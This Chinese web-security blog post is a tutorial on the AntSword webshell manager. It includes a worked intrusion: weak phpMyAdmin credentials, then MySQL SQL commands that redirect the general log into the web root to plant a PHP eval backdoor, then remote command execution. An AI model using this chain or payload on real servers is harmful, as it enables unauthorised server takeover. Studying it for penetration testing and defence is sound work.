Web安全-AntSword(中国蚁剑)Webshell管理工具使用

举报
Vista_AX 发表于 2023/07/21 08:48:47 2023/07/21
【摘要】 Web安全-AntSword(中国蚁剑)Webshell管理工具使用

01 工具下载地址

https://github.com/AntSwordProject/

蚂剑工具的下载分为两个部分,一个是项目核心源码antSword,另一个是加载器AntSword-Loader。我们依次进行下载,并且进行说明

image.png

先点击进入antSword,点击页面右侧"releases",进入工具的源码下载页面进行源码下载。

image.png

而后点击进入AntSword-Loader,点击页面右侧"releases",进入加载器下载页面,根据操作系统类型选择对应的加载器,此处以Windows举例。

image.png


下载完毕后,解压加载器的压缩包,双击打开AntSword.exe,出现如下图界面后,加载对应antSword地址即可

image.png



02 工具介绍




AntSword是一个开源、跨平台的webshell管理工具,旨在满足渗透测试人员、具有权限和/或授权的安全研究人员以及网站管理员的需求。


03 使用案例

攻击者成功利用弱口令root/root登录phpmyadmin 后台后,利用 SQL 语句 show variables like ‘%general%’;查看general log 是否开启

image.png


若发现日志读写功能关闭,于是使用 SQL 语句:SET GLOBAL general_log=‘on’; SHOW VARIABLES LIKE ‘%general%’;打开general_log 日志读写功能。

image.png


打开日志读写功能后,根据图中 general_log_file 中的绝对路径制作一个木马文件:SET GLOBAL general_log_file=‘C:/phpStudy/www/shell.php’

image.png


接着往 shell.php 写入 SELECT ’<?php eval($_POST["jkxy"]);?>

image.png


利用中国蚁剑工具连接一句话 shell.php,双击运行AntSword.exe,等初始化完成后,再双击“AntSword.exe”即可正常启动,页面功能如图所示:

image.png


shell列表区鼠标右键选择添加webshell数据:

image.png


配置相关参数信息后连接测试成功,打开虚拟终端,输入命令 whoami,发现命令执行成功。

image.png

image.png

至此攻击者通过蚂剑连接Webshell,成功获取服务器权限,后续的执行命令、文件管理、其他功能都在界面中可以进行选择:

这里对功能模块做一个简单的介绍说明:

序号 模块名称 功能介绍
1 文件管理 文件管理是 AntSword 的几大职能之一,主要涉及文件的逻辑组织和物理组织,目录的结构和管理。
2 虚拟终端 虚拟终端是 AntSword 的几大职能之一,利用 Shell 模拟终端,在远程计算机上运行应用程序,就像他们是坐在这台计算机前面一样。
3 数据库管理 数据库管理是 AntSword 的几大职能之一,通过图形化的管理界面,利用 Shell 转发功能,对远程服务器上的数据库进行快速、高效的管理
4 文件管理 可视化管理文件的增删改查等操作
6 插件市场 插件开发者将插件提交至「插件市场」后,使用者可轻松获取并使用插件。

04 参考资料

蚁剑官方文档

https://www.yuque.com/antswordproject/antsword/lmwppk
【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。